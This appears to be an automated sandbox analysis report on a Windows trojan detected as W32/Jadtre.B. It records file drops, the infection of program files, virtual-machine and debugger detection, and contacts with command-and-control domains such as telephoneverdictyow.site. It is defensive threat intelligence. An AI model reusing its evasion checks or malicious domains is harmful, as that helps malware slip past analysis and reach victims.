      Source: jawuwAtX.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Code function: 2_2_00326076
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Code function: 2_2_00326D00
      Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe 4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 1548
      Source: MyProg.exe.2.dr | Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2178655247.0000000003497000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCubase5.exeF vs Lisect_AVT_24003_G1A_72.exe
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2193713939.0000000000431000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameCubase5.exeF vs Lisect_AVT_24003_G1A_72.exe
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2180934441.0000000003472000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCubase5.exeF vs Lisect_AVT_24003_G1A_72.exe
      Source: Lisect_AVT_24003_G1A_72.exe | Binary or memory string: OriginalFilenameCubase5.exeF vs Lisect_AVT_24003_G1A_72.exe
      Source: Lisect_AVT_24003_G1A_72.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: jawuwAtX.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: jawuwAtX.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: jawuwAtX.exe.0.dr | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
      Source: Lisect_AVT_24003_G1A_72.exe | Static PE information: Section: ZLIB complexity 0.9941202546453066
      Source: Lisect_AVT_24003_G1A_72.exe | Static PE information: Section: ZLIB complexity 1.0038910505836576
      Source: Lisect_AVT_24003_G1A_72.exe | Static PE information: Section: ZLIB complexity 0.9985546038543898
      Source: Lisect_AVT_24003_G1A_72.exe | Static PE information: Section: ZLIB complexity 0.9984027121296085
      Source: classification engine | Classification label: mal100.spre.troj.evad.winEXE@5/11@8/1
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Code function: 2_2_0032119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\k1[1].rar
      Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5352
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe | File created: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: Lisect_AVT_24003_G1A_72.exe | Virustotal: Detection: 86%
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe | File read: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe
      Source: unknown | Process created: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe "C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe"
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe | Process created: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe C:\Users\user\AppData\Local\Temp\jawuwAtX.exe
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 1548
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe | Process created: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe C:\Users\user\AppData\Local\Temp\jawuwAtX.exe
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe | Section loaded: apphelp.dll
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe | Section loaded: winhttp.dll
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe | Section loaded: ondemandconnroutehelper.dll
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe | Section loaded: webio.dll
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe | Section loaded: mswsock.dll
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe | Section loaded: iphlpapi.dll
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe | Section loaded: winnsi.dll
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe | Section loaded: sspicli.dll
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe | Section loaded: dnsapi.dll
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe | Section loaded: rasadhlp.dll
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe | Section loaded: ondemandconnroutehelper.dll
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe | Section loaded: msasn1.dll
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Section loaded: apphelp.dll
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Section loaded: urlmon.dll
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Section loaded: iertutil.dll
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Section loaded: srvcli.dll
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Section loaded: netutils.dll
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Section loaded: kernel.appcore.dll
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Section loaded: uxtheme.dll
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Section loaded: wininet.dll
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Section loaded: sspicli.dll
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Section loaded: windows.storage.dll
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Section loaded: wldp.dll
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Section loaded: profapi.dll
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Section loaded: ondemandconnroutehelper.dll
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Section loaded: winhttp.dll
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Section loaded: iphlpapi.dll
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Section loaded: mswsock.dll
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Section loaded: winnsi.dll
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Section loaded: dnsapi.dll
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Section loaded: rasadhlp.dll
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Section loaded: fwpuclnt.dll
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Section loaded: ntvdm64.dll
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Section loaded: version.dll
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Section loaded: textshaping.dll
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Section loaded: textinputframework.dll
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Section loaded: coreuicomponents.dll
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Section loaded: coremessaging.dll
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Section loaded: ntmarta.dll
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Section loaded: coremessaging.dll
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Section loaded: wintypes.dll
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
      Source: Lisect_AVT_24003_G1A_72.exe | Static file information: File size 4900864 > 1048576
      Source: Lisect_AVT_24003_G1A_72.exe | Static PE information: Raw size of .boot is bigger than: 0x100000 < 0x383026
      Source: Lisect_AVT_24003_G1A_72.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

      Data Obfuscation

      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Unpacked PE file: 2.2.jawuwAtX.exe.320000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
      Source: initial sample | Static PE information: section where entry point is pointing to: #bu
      Source: Lisect_AVT_24003_G1A_72.exe | Static PE information: section name:
      Source: Lisect_AVT_24003_G1A_72.exe | Static PE information: section name:
      Source: Lisect_AVT_24003_G1A_72.exe | Static PE information: section name:
      Source: Lisect_AVT_24003_G1A_72.exe | Static PE information: section name:
      Source: Lisect_AVT_24003_G1A_72.exe | Static PE information: section name:
      Source: Lisect_AVT_24003_G1A_72.exe | Static PE information: section name: .imports
      Source: Lisect_AVT_24003_G1A_72.exe | Static PE information: section name: .themida
      Source: Lisect_AVT_24003_G1A_72.exe | Static PE information: section name: .boot
      Source: Lisect_AVT_24003_G1A_72.exe | Static PE information: section name: #bu
      Source: jawuwAtX.exe.0.dr | Static PE information: section name: .aspack
      Source: jawuwAtX.exe.0.dr | Static PE information: section name: .adata
      Source: Uninstall.exe.2.dr | Static PE information: section name: EpNuZ
      Source: MyProg.exe.2.dr | Static PE information: section name: PELIB
      Source: MyProg.exe.2.dr | Static PE information: section name: Y|uR
      Source: SciTE.exe.2.dr | Static PE information: section name: u
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Code function: 2_2_00321638 push dword ptr [00323084h]; ret 2_2_0032170E
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Code function: 2_2_00326014 push 003214E1h; ret 2_2_00326425
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Code function: 2_2_00322D9B push ecx; ret 2_2_00322DAB
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Code function: 2_2_0032600A push ebp; ret 2_2_0032600D
      Source: Lisect_AVT_24003_G1A_72.exe | Static PE information: section name: entropy: 7.9668438970178
      Source: Lisect_AVT_24003_G1A_72.exe | Static PE information: section name: #bu entropy: 6.935155293246564
      Source: jawuwAtX.exe.0.dr | Static PE information: section name: .text entropy: 7.81169422100848
      Source: Uninstall.exe.2.dr | Static PE information: section name: EpNuZ entropy: 6.934455585546093
      Source: MyProg.exe.2.dr | Static PE information: section name: Y|uR entropy: 6.934357838115891
      Source: SciTE.exe.2.dr | Static PE information: section name: u entropy: 6.9340336005643985

      Persistence and Installation Behavior

      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | System file written: C:\Program Files\7-Zip\Uninstall.exe
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | File created: C:\Program Files\7-Zip\Uninstall.exe
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe | File created: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

      Boot Survival

      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe | Window searched: window name: RegmonClass
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe | Window searched: window name: FilemonClass
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe | Window searched: window name: PROCMON_WINDOW_CLASS

      Hooking and other Techniques for Hiding and Protection

      Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 799
      Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 799
      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe | System information queried: FirmwareTableInformation
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Evasive API call chain: GetSystemTimeAsFileTime, DecisionNodes graph_2-1046
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe TID: 5204 | Thread sleep time: -60000s >= -30000s
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe TID: 5204 | Thread sleep time: -30000s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Code function: 2_2_00321718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00321754h
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Code function: 2_2_003229E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Code function: 2_2_00322B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
      Source: Amcache.hve.2.dr | Binary or memory string: VMware
      Source: Amcache.hve.2.dr | Binary or memory string: VMware Virtual USB Mouse
      Source: Amcache.hve.2.dr | Binary or memory string: vmci.syshbin
      Source: Amcache.hve.2.dr | Binary or memory string: VMware, Inc.
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195660941.000000000138E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4=
      Source: Amcache.hve.2.dr | Binary or memory string: VMware20,1hbin@
      Source: Amcache.hve.2.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
      Source: Amcache.hve.2.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.2.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
      Source: Amcache.hve.2.dr | Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
      Source: jawuwAtX.exe, 00000002.00000002.2236131842.0000000001041000.00000004.00000020.00020000.00000000.sdmp, jawuwAtX.exe, 00000002.00000002.2236131842.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp, jawuwAtX.exe, 00000002.00000003.2163557052.0000000001041000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
      Source: Amcache.hve.2.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.2.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
      Source: Amcache.hve.2.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
      Source: jawuwAtX.exe, 00000002.00000002.2236131842.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW0T
      Source: Amcache.hve.2.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.2.dr | Binary or memory string: vmci.sys
      Source: Amcache.hve.2.dr | Binary or memory string: vmci.syshbin`
      Source: Amcache.hve.2.dr | Binary or memory string: \driver\vmci,\driver\pci
      Source: Amcache.hve.2.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.2.dr | Binary or memory string: VMware20,1
      Source: Amcache.hve.2.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
      Source: Amcache.hve.2.dr | Binary or memory string: NECVMWar VMware SATA CD00
      Source: Amcache.hve.2.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
      Source: Amcache.hve.2.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
      Source: Amcache.hve.2.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
      Source: Amcache.hve.2.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
      Source: Amcache.hve.2.dr | Binary or memory string: VMware PCI VMCI Bus Device
      Source: Amcache.hve.2.dr | Binary or memory string: VMware VMCI Bus Device
      Source: Amcache.hve.2.dr | Binary or memory string: VMware Virtual RAM
      Source: Amcache.hve.2.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
      Source: Amcache.hve.2.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | API call chain: ExitProcess graph end node graph_2-1021
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe | System information queried: ModuleInformation

      Anti Debugging

      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe | Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe | Open window title or class name: regmonclass
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe | Open window title or class name: procmon_window_class
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe | Open window title or class name: filemonclass
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe | Process queried: DebugPort
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe | Process queried: DebugPort
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe | Process queried: DebugObjectHandle

      HIPS / PFW / Operating System Protection Evasion

      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: strainriskpropos.stor
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: telephoneverdictyow.site
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: punchtelephoneverdi.stor
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: smallrabbitcrossing.site
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: snuggleapplicationswo.fun
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: theoryapparatusjuko.fun
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: healthproline.pro
      Source: SciTE.exe.2.dr | Binary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Code function: 2_2_00321718 GetSystemTimeAsFileTime,SHSetValueA,SHGetValueA,__aulldiv,__aulldiv
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Code function: 2_2_0032139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId
      Source: jawuwAtX.exe, 00000002.00000003.2163557052.0000000001026000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\C:\Program Files\Windows Defender\MsMpEng.exe
      Source: Amcache.hve.2.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
      Source: Amcache.hve.2.dr | Binary or memory string: msmpeng.exe
      Source: Amcache.hve.2.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
      Source: Amcache.hve.2.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
      Source: Amcache.hve.2.dr | Binary or memory string: MsMpEng.exe

      Stealing of Sensitive Information

      Source: Yara match | File source: Process Memory Space: jawuwAtX.exe PID: 5352, type: MEMORYSTR
      Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR

      Remote Access Functionality

      Source: Yara match | File source: Process Memory Space: jawuwAtX.exe PID: 5352, type: MEMORYSTR
      Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
MITRE ATT&CK Matrix (techniques listed per tactic; a number preceding a technique is the count shown in the report)

• Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies
• Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless
• Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
• Execution: 1 Native API, 1 PowerShell, At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job
• Persistence: 1 DLL Side-Loading, Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
• Privilege Escalation: 1 Access Token Manipulation, 2 Process Injection, 1 DLL Side-Loading, Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
• Defense Evasion: 1 Masquerading, 33 Virtualization/Sandbox Evasion, 1 Access Token Manipulation, 2 Process Injection, 1 Deobfuscate/Decode Files or Information, 2 Obfuscated Files or Information, 13 Software Packing, 1 DLL Side-Loading
• Credential Access: 11 Input Capture, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
• Discovery: 11 System Time Discovery, 631 Security Software Discovery, 33 Virtualization/Sandbox Evasion, 1 Process Discovery, 3 File and Directory Discovery, 4 System Information Discovery, Remote System Discovery, System Owner/User Discovery
• Lateral Movement: 1 Taint Shared Content, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services
• Collection: 11 Input Capture, 1 Archive Collected Data, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
• Command and Control: 1 Encrypted Channel, 11 Non-Standard Port, 2 Ingress Tool Transfer, 2 Non-Application Layer Protocol, 112 Application Layer Protocol, Multiband Communication, Commonly Used Port, Application Layer Protocol
• Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
• Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement


Source | Detection | Scanner | Label
Lisect_AVT_24003_G1A_72.exe | 86% | Virustotal |
Lisect_AVT_24003_G1A_72.exe | 100% | Avira | W32/Jadtre.B
Lisect_AVT_24003_G1A_72.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Program Files\7-Zip\Uninstall.exe | 100% | Avira | W32/Jadtre.B
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe | 100% | Avira | W32/Jadtre.B
C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | 100% | Avira | TR/Dldr.Small.Z.haljq
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | 100% | Avira | W32/Jadtre.B
C:\Program Files\7-Zip\Uninstall.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | 92% | ReversingLabs | Win32.Trojan.Madeba
      No Antivirus matches
Source | Detection | Scanner | Label
ddos.dnsnb8.net | 13% | Virustotal |
healthproline.pro | 11% | Virustotal |
telephoneverdictyow.site | 21% | Virustotal |
